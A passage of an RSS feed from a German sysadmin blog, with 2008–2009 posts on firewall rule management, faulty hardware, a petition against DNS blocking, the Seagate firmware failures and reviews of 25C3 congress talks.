<p>Wenn dort (z.B. bei einem komplizierterem Script) Werte von mehr als 5 Sekunden stehen, sollte man sein Script für hohe Bandbreiten ggfs. überarbeiten und/oder in einer performanteren Sprache reimplementieren,  z.B. in C oder für Extremfälle in Assembler. <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <em><br />
</em><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/tests/squid-url_rewrite-performance/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Firewallregelmanagement</title>
		<link>http://www.adminlife.net/adminlife/firewallregelmanagement/</link>
		<comments>http://www.adminlife.net/adminlife/firewallregelmanagement/#comments</comments>
		<pubDate>Sun, 20 Sep 2009 16:04:29 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[howtos]]></category>
		<category><![CDATA[wissen]]></category>
		<category><![CDATA[backup]]></category>
		<category><![CDATA[bsi]]></category>
		<category><![CDATA[firewall]]></category>
		<category><![CDATA[Firewallregeln]]></category>
		<category><![CDATA[Repo]]></category>
		<category><![CDATA[Sicherung]]></category>
		<category><![CDATA[SVN]]></category>
		<category><![CDATA[zertifizierung]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1726</guid>
		<description><![CDATA[Ich frage mich, wie ihr eure Firewallregeln in Firmenfirewalls verwaltet und sichert &#8211; wer iptables oder eine darauf basierende Lösung besitzt, wird wohl einfach automatisch oder eventbasiert Backups machen oder die Regeln in ein Repo einchecken &#8211; doch was machen die armen Admins, die mit proprietärer Hardware zu tun haben? Mir fallen spontan folgende 5 [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Ich frage mich, wie ihr eure Firewallregeln in Firmenfirewalls verwaltet und sichert &#8211; wer iptables oder eine darauf basierende Lösung besitzt, wird wohl einfach automatisch oder eventbasiert Backups machen oder die Regeln in ein Repo einchecken &#8211; doch was machen die armen Admins, die mit proprietärer Hardware zu tun haben? Mir fallen spontan folgende 5 Punkte ein:</p>
<ul>
<li>Programmieren einer Schnittstelle, die die Regeln ausliest und in ein Repo eincheckt</li>
<li>Automatische Backups durch die Firewall erzeugen lassen (oftmals per Mail möglich) und einchecken in ein Repo</li>
<li>Eingeben der Firewallregeln in ein Dokumentationssystem</li>
<li>Eingeben der Firewallregeln in ein System, welches die Regeln dann auf der Firewall anlegt</li>
<li>Keine Dokumentation <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </li>
</ul>
<p>Mich würde interessieren, wie ihr hier vorgeht? Z.B. für eine Zertifizierung nach dem <a href="http://de.wikipedia.org/wiki/IT-Grundschutzhandbuch">IT-Grundschutzhandbuch</a> sind solche organisatorischen Dinge nicht ganz unwichtig.<!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/adminlife/firewallregelmanagement/feed/</wfw:commentRss>
		<slash:comments>16</slash:comments>
		</item>
		<item>
		<title>Hardware&#228;rger</title>
		<link>http://www.adminlife.net/allgemein/hardwareaerger/</link>
		<comments>http://www.adminlife.net/allgemein/hardwareaerger/#comments</comments>
		<pubDate>Sat, 22 Aug 2009 21:18:57 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[reviews]]></category>
		<category><![CDATA[tests]]></category>
		<category><![CDATA[775]]></category>
		<category><![CDATA[AM2]]></category>
		<category><![CDATA[AMD]]></category>
		<category><![CDATA[DDR]]></category>
		<category><![CDATA[DDR2]]></category>
		<category><![CDATA[DDR3]]></category>
		<category><![CDATA[defekt]]></category>
		<category><![CDATA[hardware]]></category>
		<category><![CDATA[intel]]></category>
		<category><![CDATA[Sockel]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1677</guid>
		<description><![CDATA[In letzter Zeit hatte ich wirklich viel Hardwareärger &#8211; allerdings nur mit frisch gekaufter Neuhardware und nicht mit dem teils fast 10 Jahre alten Kram, den ich hier noch rumstehen habe&#8230; Und zwar: - 2 Asus AM2 Boards (Alternate): jeweils mit defektem Spannungswandler - MSI-AM2 Motherboard (Alternate): der Lüfter läuft nach 1-2 Wochen zu schnell, [...]]]></description>
			<content:encoded><![CDATA[<p>In letzter Zeit hatte ich wirklich viel Hardwareärger &#8211; allerdings nur mit frisch gekaufter Neuhardware und nicht mit dem teils fast 10 Jahre alten Kram, den ich hier noch rumstehen habe&#8230;</p>
<p>Und zwar:</p>
<p>- 2 Asus AM2 Boards (Alternate): jeweils mit defektem Spannungswandler</p>
<p>- MSI-AM2 Motherboard (Alternate): der Lüfter läuft nach 1-2 Wochen zu schnell, da das Board dann falsche Sensorwerte über die Temperatur meldet</p>
<p>- Komplett-PC Sockel 775 (Mindfactory): diverse BIOS-Einstellungen falsch (DANKE an Mindfactory dafür, System war so nicht lauffähig) defekter Spannungswandler des Mainbords (Gigabyte)</p>
<p>- Bundle (Alternate): Asrock AM3 Board, DDR3, x2 250 von Alternate: Spring nichtmal an, kein BIOS-Piepser&#8230;</p>
<p>*Seufz*. Vor allem die extrem laut fiependen Spannungswandlern sind echt nervig &#8211; bei Asus scheinen einige Serien komplett davon betroffen zu sein.<br />
Allgemein habe ich so das Gefühl, dass die Qualität und Kompatibilität der PC-Komponenten ab der DDR2-Genaration deutlich abgenommen hat&#8230; <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> <!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/hardwareaerger/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>JETZT mitmachen: Petition gegen Internetsperren!</title>
		<link>http://www.adminlife.net/netzwelt/jetzt-mitmachen-petition-gegen-dns-sperren/</link>
		<comments>http://www.adminlife.net/netzwelt/jetzt-mitmachen-petition-gegen-dns-sperren/#comments</comments>
		<pubDate>Mon, 04 May 2009 21:28:45 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[netzwelt]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[bka]]></category>
		<category><![CDATA[dns]]></category>
		<category><![CDATA[Laienhaft]]></category>
		<category><![CDATA[Layenhaft]]></category>
		<category><![CDATA[petition]]></category>
		<category><![CDATA[sperre]]></category>
		<category><![CDATA[sperrung]]></category>
		<category><![CDATA[von Laien regiert]]></category>
		<category><![CDATA[Zernsur]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1527</guid>
		<description><![CDATA[Die DNS-Sperren wurden ja in der &#8220;Bloggosphäre&#8221; reichlich diskutiert und werden allgemein als sinnlos für den angedachten Zweck und schädlich für den Normalbürger erachtet, auch weil schon jetzt hinter vorgehaltener Hand neue Überwachungs und Kontrollmöglichkeiten diskutiert werden, wie z.B. die Echtzeitüberwachung der Stopp-Seiten. Nun gibt es eine Petition gegen die Zensur durch die Hintertür: hier [...]]]></description>
			<content:encoded><![CDATA[<p align="justify"><img class="alignleft size-medium wp-image-1492" src="http://www.adminlife.net/wp-content/uploads/2009/04/stopp-300x300.png" alt="stopp" width="117" height="117" />Die DNS-Sperren wurden ja in der &#8220;Bloggosphäre&#8221; reichlich diskutiert und werden allgemein als sinnlos für den angedachten Zweck und schädlich für den Normalbürger erachtet, auch weil schon jetzt hinter vorgehaltener Hand neue Überwachungs und Kontrollmöglichkeiten diskutiert werden, wie z.B. die Echtzeitüberwachung der Stopp-Seiten.</p>
<p align="justify">Nun gibt es eine Petition gegen die Zensur durch die Hintertür: <strong><a href="https://epetitionen.bundestag.de/index.php?action=petition;sa=details;petition=3860">hier</a></strong> mitzeichnen! Heute morgen waren es bloß ca. 1.000 Mitzeichner, nun sind es bereits über 12.000. Laßt euch bitte nicht davon entmutigen, dass die Seite etwas lahm ist und man sich anmelden muss! Verbreitet die Seite außerdem bitte weiter, erzählt davon und klärt darüber auf, was es mit den DNS-Sperren auf sich hat!</p>
<p align="justify">
<p align="justify">
<p align="justify">
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/netzwelt/jetzt-mitmachen-petition-gegen-dns-sperren/feed/</wfw:commentRss>
		<slash:comments>18</slash:comments>
		</item>
		<item>
		<title>Nicht alle Provider sollen zensieren</title>
		<link>http://www.adminlife.net/news/nicht-alle-provider-sollen-zensieren/</link>
		<comments>http://www.adminlife.net/news/nicht-alle-provider-sollen-zensieren/#comments</comments>
		<pubDate>Sat, 18 Apr 2009 20:46:45 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[news]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1497</guid>
		<description><![CDATA[Ausgenommen sind Anbieter mit weniger als 10.000 Nutzern, außerdem staatlichen Dienste wie Hochschulnetze und Behörden-Provider sowie einige hundert regionale Netzanbieter. Völlig inkonsequent. Kinderpornos nur für Politiker und Studenten, hurra!? Kostet ja auch alles Geld und Zeit, was der Bund nicht ausgeben will. Aber die freie Wirtschaft &#8220;darf&#8221; es &#8220;freiwillig&#8221; tun, sonst wird sie als Kinderporno-Unterstützer [...]]]></description>
			<content:encoded><![CDATA[<blockquote><p>Ausgenommen sind Anbieter mit weniger als 10.000 Nutzern, außerdem staatlichen Dienste wie Hochschulnetze und <b>Behörden-Provider</b> sowie einige hundert regionale Netzanbieter.</p></blockquote>
<p align="justify">Völlig inkonsequent. Kinderpornos nur für Politiker und Studenten, hurra!? Kostet ja auch alles Geld und Zeit, was der Bund nicht ausgeben will. Aber die freie Wirtschaft &#8220;darf&#8221; es &#8220;freiwillig&#8221; tun, sonst wird sie als Kinderporno-Unterstützer abgestempelt! Vielleicht wollen die Politiker die nächsten Internetsperren für z.B. Onlinepoker nicht bekommen, oder fänden es vielleicht zu schwierig, die lächerlichen DNS-Sperren zu umgehen? Die Zypris weiß ja noch nicht einmal, wie dieses Internet-Surfdings heißt! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p align="justify">Interessant wäre jetzt zu wissen, ob man als Betreiber eines komplett öffentlichen DNS-Resolvers nun irgendwas machen muss, denn man bietet ja im Grunde vielen Millionen Nutzern einen Dienst an&#8230;</p>
<p>Quelle:<br />
<a HREF="http://www.spiegel.de/spiegel/vorab/0,1518,619707,00.html">Spiegel</a><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/news/nicht-alle-provider-sollen-zensieren/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Disput bei OpenBSD &#8211; wegen Einnahmen</title>
		<link>http://www.adminlife.net/news/disput-bei-openbsd-wegen-einnahmen/</link>
		<comments>http://www.adminlife.net/news/disput-bei-openbsd-wegen-einnahmen/#comments</comments>
		<pubDate>Fri, 10 Apr 2009 23:30:38 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[news]]></category>
		<category><![CDATA[openbsd]]></category>
		<category><![CDATA[probleme]]></category>
		<category><![CDATA[puffy]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1414</guid>
		<description><![CDATA[Wim Vandeputte hat derzeit wohl ein paar Probleme mit Theo de Raadt, dem OpenBSD Führer &#8211; es geht um Merchendiseeinnahmen. Traurig, dass es letztlich immer ums Geld gehen muss! Wim kenne ich übrigens persönlich flüchtig von den Chaos Communication Congressen &#38; Camp und würde ihn als aufrichtigen, netten Menschen beschreiben &#8211; von Theo bekommt man [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft" src="http://www.openbsd.org/art/puffy/puf100X86.gif" alt="" width="100" height="86" /></p>
<p align="justify">Wim Vandeputte hat derzeit wohl ein paar Probleme mit Theo de Raadt, dem OpenBSD Führer &#8211; es geht um Merchendiseeinnahmen. Traurig, dass es letztlich immer ums Geld gehen muss! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p align="justify">Wim kenne ich übrigens persönlich flüchtig von den Chaos Communication Congressen &amp; Camp und würde ihn als aufrichtigen, netten Menschen beschreiben &#8211; von Theo bekommt man ja leider immer nur das Gegenteil mit. Ich bin gespannt, wie sich das Ganze entwickelt!</p>
<p align="justify">Wer die Details lesen will, kann dies auf <a href="http://accounting.kd85.com">accounting.kd85.com</a> tun.</p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/news/disput-bei-openbsd-wegen-einnahmen/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Diagnose Format C:</title>
		<link>http://www.adminlife.net/dau/diagnose-format-c/</link>
		<comments>http://www.adminlife.net/dau/diagnose-format-c/#comments</comments>
		<pubDate>Wed, 18 Mar 2009 00:01:15 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[dau]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1356</guid>
		<description><![CDATA[Kennt ihr das auch? Man lernt jemanden kennen und sobald derjenige mitbekommt, dass man als Administrator arbeitet, befragt er einen auch schon nach irgendwelchen bescheuerten Windowsproblemen&#8230; Zuletzt durfte ich mir auch mal anhören, dass ich ja noch sehr viel zu lernen habe, weil ich das Tastenkürzel für &#8220;linksbündig&#8221; in Word nicht kenne &#8211; und das [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">Kennt ihr das auch? Man lernt jemanden kennen und sobald derjenige mitbekommt, dass man als Administrator arbeitet, befragt er einen auch schon nach irgendwelchen bescheuerten Windowsproblemen&#8230;<br />
Zuletzt durfte ich mir auch mal anhören, dass ich ja noch sehr viel zu lernen habe, weil ich das Tastenkürzel für &#8220;linksbündig&#8221; in Word nicht kenne &#8211; und das von jemandem, der es nach mehreren Stunden probieren nichtmal über das Symbol geschafft hat&#8230; *seufz*</p>
<p>Meine Diagnose ab sofort lautet &#8220;Format C:&#8221; !<br />
Siehe auch: <a href="http://www.arschkrebs.de">arschkrebs.de</a> <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> <!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/dau/diagnose-format-c/feed/</wfw:commentRss>
		<slash:comments>15</slash:comments>
		</item>
		<item>
		<title>Das Seagate Debakel</title>
		<link>http://www.adminlife.net/news/das-seagate-debakel/</link>
		<comments>http://www.adminlife.net/news/das-seagate-debakel/#comments</comments>
		<pubDate>Sat, 17 Jan 2009 18:12:29 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[adminlife]]></category>
		<category><![CDATA[news]]></category>
		<category><![CDATA[tools]]></category>
		<category><![CDATA[ausfall]]></category>
		<category><![CDATA[Barracuda 7200.11]]></category>
		<category><![CDATA[Barracuda ES.2]]></category>
		<category><![CDATA[defekt]]></category>
		<category><![CDATA[DiamondMax 22]]></category>
		<category><![CDATA[Fail]]></category>
		<category><![CDATA[festplatte]]></category>
		<category><![CDATA[firmware]]></category>
		<category><![CDATA[KB 207931]]></category>
		<category><![CDATA[sata]]></category>
		<category><![CDATA[Seagate]]></category>
		<category><![CDATA[SV35]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1164</guid>
		<description><![CDATA[Für alle, dies es noch nicht mitbekommen haben: Seagate hat grade massive Probleme mit ihren Festplattenserien, die Reihen Barracuda 7200.11, Barracuda ES.2 SATA und DiamondMax 22 fallen nach wenigen Monaten total aus. Im KB #207931 ist zusammengefasst, welche Festplatten betroffen sind. Man kann dort ein Windows-Tool herunterladen und damit überprüfen, ob der eigene Rechner betroffen [...]]]></description>
			<content:encoded><![CDATA[<p align="justify"><img class="alignleft" src="http://www.pretaktovanie.sk/obr/hdd/seagate/01/Barracuda_top.jpg" alt="" width="124" height="159" />Für alle, dies es noch nicht mitbekommen haben: Seagate hat grade massive Probleme mit ihren Festplattenserien, die Reihen Barracuda 7200.11, Barracuda ES.2 SATA und DiamondMax 22 fallen nach wenigen Monaten total aus. Im <a href="http://seagate.custkb.com/seagate/crm/selfservice/search.jsp?Tab=search&amp;Module=selfservice&amp;TargetLanguage=selfservice&amp;DocId=207931&amp;NewLang=en">KB #207931</a> ist zusammengefasst, welche Festplatten betroffen sind. Man kann dort ein Windows-Tool herunterladen und damit überprüfen, ob der eigene Rechner betroffen ist &#8211; für Linux gibt es von Seagate mal wieder nichts, es wurde daher von fähiger Hand schnell etwas entwickelt! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  <a href="http://ge.mine.nu/seagate-207931.html">Download seagate-207931.sh</a><br />
Das Tool kann die Daten nicht nur von direkt angeschlossenen Festplatten anzeigen, sondern auch von RAIDs, sofern ein 3Ware-Controller und tw_cli oder Adaptec mit arcconf benutzt wird. Das Praktische daran ist, dass man mit dem Script dann gleich z.B. per SSH seine ganze Serverfarm durchchecken kann und weiß, was auf einen zukommt&#8230;</p>
<p>Besonders tragisch finde ich, dass auch die Raid Edition 2 betroffen ist, die man ja grade für professionell eingesetzte Systeme kauft&#8230; :/</p>
<p>Peinlich: mit der 1,5TB-Serie gab es kürzlich auch gravierende Probleme &#8211; bei Disk flushs fror die Platte ein. Machen die überhaupt QS?!?</p>
<p>Bei uns steht übrigens grade die Anschaffung von ~20 Servern vor der Tür, ich weiß schon, Festplatten welches Herstellers nicht gekauft werden.</p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/news/das-seagate-debakel/feed/</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>Kommentar: Computerausfall der Bahn</title>
		<link>http://www.adminlife.net/allgemein/kommentar-computerausfall-der-bahn/</link>
		<comments>http://www.adminlife.net/allgemein/kommentar-computerausfall-der-bahn/#comments</comments>
		<pubDate>Thu, 15 Jan 2009 19:05:44 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[news]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1155</guid>
		<description><![CDATA[Die Bahn hatte einen bundesweite Störung ihrer Computersysteme zu beklagen, der massive Störungen beim Fahrkartenverkauf und der Zugabfertigung mit sich brachte. So weit so gut. Das Problem ist bisher allerdings noch nicht ausgemacht, für die Bahn selbst ist das Problem noch &#8220;mysteriös&#8221; &#8211; ihr Sprecher verkündete aber sogleich, dass so ein Ausfall nicht nochmal vorkommen [...]]]></description>
			<content:encoded><![CDATA[<p><img src="http://www.adminlife.net/wp-content/uploads/2009/01/logo-db-bahn2.png" alt="logo-db-bahn" title="logo-db-bahn" width="126" height="32" class="alignleft size-full wp-image-1162" />
<p align="justify">Die Bahn hatte einen bundesweite Störung ihrer Computersysteme zu beklagen, der massive Störungen beim Fahrkartenverkauf und der Zugabfertigung mit sich brachte. So weit so gut. Das Problem ist bisher allerdings noch nicht ausgemacht, für die Bahn selbst ist das Problem noch &#8220;mysteriös&#8221; &#8211; ihr Sprecher verkündete aber sogleich, dass so ein Ausfall nicht nochmal vorkommen werde!</p>
<p>Mutig!</p>
<p>Wild Guess: ein von einem Bahnarbeiter per USB-Stick eingeschleuster Wurm hat im internen Netz (&#8220;muss man ja nicht patchen, kommt ja keiner ran!&#8221;) etwas gewütet&#8230;</p>
<p>Quelle: <a href="http://www.tagesschau.de/inland/bahn772.html">Tagesschau</a><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/kommentar-computerausfall-der-bahn/feed/</wfw:commentRss>
		<slash:comments>9</slash:comments>
		</item>
		<item>
		<title>25c3 #3</title>
		<link>http://www.adminlife.net/allgemein/25c3-3/</link>
		<comments>http://www.adminlife.net/allgemein/25c3-3/#comments</comments>
		<pubDate>Thu, 08 Jan 2009 00:35:09 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[25c3]]></category>
		<category><![CDATA[ccc]]></category>
		<category><![CDATA[congress]]></category>
		<category><![CDATA[vortrag]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1121</guid>
		<description><![CDATA[Erwähnenswert auch noch: Dunking Donuts DDoS Die Vortragenden des iPhone-Hacking-Vortrags sind auf dem Video aus offensichtlichen Gründen nicht zu sehen Der Wikileaks-Vortrag wurde garnicht aufgenommen, um die Privatsphäre der Vortragenden zu schützen Das LKA hat wohl (halbherzig und erfolglos) versucht, die Wikileaks-Leute wg. der BND-Geschichte zu verhaften, leider habe ich keine genaueren Details &#8220;Der Dritte [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">
<img SRC="http://events.ccc.de/congress/2008/wiki/images/thumb/9/98/Half_banner_234x60.gif/180px-Half_banner_234x60.gif"></p>
<p align="justify">
Erwähnenswert auch noch:</p>
<ul>
<li><a HREF="http://www.youtube.com/watch?v=3b6Kzm6y6c0">Dunking Donuts DDoS</a></li>
<li>Die Vortragenden des iPhone-Hacking-Vortrags sind auf dem Video aus offensichtlichen Gründen nicht zu sehen</li>
<li>Der Wikileaks-Vortrag wurde garnicht aufgenommen, um die Privatsphäre der Vortragenden zu schützen</li>
<li>Das LKA hat wohl (halbherzig und erfolglos) versucht, die Wikileaks-Leute wg. der BND-Geschichte zu verhaften, leider habe ich keine genaueren Details</li>
<li>&#8220;Der Dritte Raum&#8221; hat unter falschem Namen in der Lounge aufgelegt! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
<li>Der Serverraum des Hackcenters war wie immer das totale Chaos &#8211; frei nach dem Motto &#8220;Kabelsalat ist gesund!&#8221;</li>
</ul>
<p>Rack mit Patchpanel und Core-Switches mit 10GE Uplinks für das Hackcenter:<br />
<img src="http://www.adminlife.net/wp-content/uploads/2009/01/bild007-240x300.jpg" alt="bild007" width="240" height="300" class="alignnone size-medium wp-image-1122" /></p>
<p>SAN mit jeder Menge Plattenplatz:<br />
<img src="http://www.adminlife.net/wp-content/uploads/2009/01/bild010-240x300.jpg" alt="bild010" width="240" height="300" class="alignnone size-medium wp-image-1125" /></p>
<p>Colocation für ein paar Server:<br />
<img src="http://www.adminlife.net/wp-content/uploads/2009/01/bild009-300x240.jpg" alt="bild009" width="300" height="240" class="alignnone size-medium wp-image-1123" />
</p>
<p>Achja&#8230;schön wars! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> <!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/25c3-3/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>25C3 #2</title>
		<link>http://www.adminlife.net/allgemein/25c3-2/</link>
		<comments>http://www.adminlife.net/allgemein/25c3-2/#comments</comments>
		<pubDate>Thu, 08 Jan 2009 00:22:36 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[netzwelt]]></category>
		<category><![CDATA[reviews]]></category>
		<category><![CDATA[25c3]]></category>
		<category><![CDATA[ccc]]></category>
		<category><![CDATA[congress]]></category>
		<category><![CDATA[vortrag]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1110</guid>
		<description><![CDATA[Noch ein paar weitere, gesehene Vorträge: Banking Trojans 101 &#8211; Thorsten Holz -&#62; Eigentlich nur eine Zusammenfassung bereits bekannter Sachen&#8230;interessant war aber &#8220;then a mystery happens and we get access to the dropzone&#8221;, was auch nicht näher erläutert wurde&#8230; Fnord News Show &#8211; Felix von Leitner / Frank Rieger -&#62; Genial wie immer! Jeder sollte [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">
<img SRC="http://events.ccc.de/congress/2008/wiki/images/thumb/9/98/Half_banner_234x60.gif/180px-Half_banner_234x60.gif"></p>
<p>Noch ein paar weitere, gesehene Vorträge:</p>
<ul>
<li>Banking Trojans 101 &#8211; Thorsten Holz -&gt; Eigentlich nur eine Zusammenfassung bereits bekannter Sachen&#8230;interessant war aber &#8220;then a mystery happens and we get access to the dropzone&#8221;, was auch nicht näher erläutert wurde&#8230; <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </li>
<li>Fnord News Show &#8211; Felix von Leitner / Frank Rieger -&gt; Genial wie immer! Jeder sollte ein paar Fnords sehen&#8230;mit am Besten war die Diebold-CIA-Koks-Connection! <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </li>
<li>Cisco IOS attack and defense &#8211; FX of Phenoelit -&gt; Outstanding. Wiedereinmal hat FX neue, Erkenntnisse zum IOS-Hacking publik gemacht. Jeder Netzwerker sollte sich den Talk ansehen!</li>
<li>Hacker Jeopardy &#8211; Stefan &#8216;Sec&#8217; Zehl / Ray -&gt; Pure Fun, as usual!</li>
<li>Security Nightmares 2009 &#8211; Frank Rieger / Ron -&gt; Hoffentlich funktioniert die Glaskugel nicht korrekt&#8230;</li>
<li>Closing Ceremony / Sandro Gaycken -&gt; wie immer, die Interessante Zusammenfassung der Congressereignisse. Es wurde auch der komische Typ erwähnt, der im Hackcenter und am NOC Helpdesk Hacks gegen Geld kaufen wollte (und daraufhin mit einem &#8220;FED&#8221;-Schild markiert wurde *gg) <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' /> </li>
</ul>
<p align="justify">
Einige weitere Streams habe ich mir im Hackcenter sitzend angehört, schreibe dazu jedoch erstmal nichts, weil ich einfach dauernd abgelenkt wurde&#8230;</p>
<p align="justify">Des weiteren war noch der Workshop <a HREF="https://events.ccc.de/congress/2008/wiki/Bastard_ISPs_from_Hell">Bastard ISPs from Hell</a> bemerkenswert, darin ging es um Trafficmanipulationen, die durch ISPs vorgenommen werden können &#8211; das Ganze wurde dann auch noch testweise selbst durchgeführt&#8230; <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' />  </p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/25c3-2/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>25C3 #1</title>
		<link>http://www.adminlife.net/allgemein/25c3-1/</link>
		<comments>http://www.adminlife.net/allgemein/25c3-1/#comments</comments>
		<pubDate>Sun, 28 Dec 2008 19:47:44 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>
		<category><![CDATA[25c3]]></category>
		<category><![CDATA[ccc]]></category>
		<category><![CDATA[congress]]></category>
		<category><![CDATA[vortrag]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=1028</guid>
		<description><![CDATA[Ich befinde mich derzeit auf dem 25C3&#8230;gesehene Vorträge bisher: Why were we so vulnerable to the DNS vulnerability? &#8211; Dan Kaminsky -&#62; Exzellent Attacking Rich Internet Applications &#8211; Stefano Di Paolo / Kuzo55 -&#62; Inhalt war OK, allerdings etwas langweilig Vorgetragen &#8211; vor allem Stefano Di Paolos Italenglisch war grauenhaft und machte garkeinen Spass Vulnerability [...]]]></description>
			<content:encoded><![CDATA[<p align="justify">
<img SRC="http://events.ccc.de/congress/2008/wiki/images/thumb/9/98/Half_banner_234x60.gif/180px-Half_banner_234x60.gif"></p>
<p>Ich befinde mich derzeit auf dem 25C3&#8230;gesehene Vorträge bisher:</p>
<ul>
<li>Why were we so vulnerable to the DNS vulnerability? &#8211; Dan Kaminsky -&gt; Exzellent <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </li>
<li>Attacking Rich Internet Applications &#8211; Stefano Di Paolo / Kuzo55 -&gt; Inhalt war OK, allerdings etwas langweilig Vorgetragen &#8211; vor allem Stefano Di Paolos Italenglisch war grauenhaft und machte garkeinen Spass <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </li>
<li>Vulnerability discovery in encrypted closed source PHP applications &#8211; Stefan Esser -&gt; Exzellent, gute technische Details</li>
<li> TCP Denial of Service &#8211; Fabian Yamaguchi -&gt; Gut, wenngleich die Inhalte schon bekannt waren</li>
<li> Banking Malware &#8211; Thorsten Holz -&gt; Läuft grade <img src='http://www.adminlife.net/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </li>
</ul>
<p align="justify">
Es ist übrigens EXTREMST voll, die Dauertickets sind schon längst allesamt verkauft &#8211; wer bei Vorträgen einen Sitzplatz ergattert, darf sich glücklich schätzen! Bei einigen Vorträgen mußten auch Leute rausgeworfen werden, weil es zu voll war und alle Ausgänge komplett verstopft waren&#8230;<br />
Es blieb ihnen wenigstens noch der Videostream, der übrigens erstaunlich stabil läuft.
</p>
<p><!-- PHP 5.x --></p>
]]></content:encoded>
			<wfw:commentRss>http://www.adminlife.net/allgemein/25c3-1/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>dsbl.org down!</title>
		<link>http://www.adminlife.net/allgemein/dsblorg-down/</link>
		<comments>http://www.adminlife.net/allgemein/dsblorg-down/#comments</comments>
		<pubDate>Thu, 25 Sep 2008 21:12:54 +0000</pubDate>
		<dc:creator>stefan</dc:creator>
				<category><![CDATA[allgemein]]></category>

		<guid isPermaLink="false">http://www.adminlife.net/?p=865</guid>
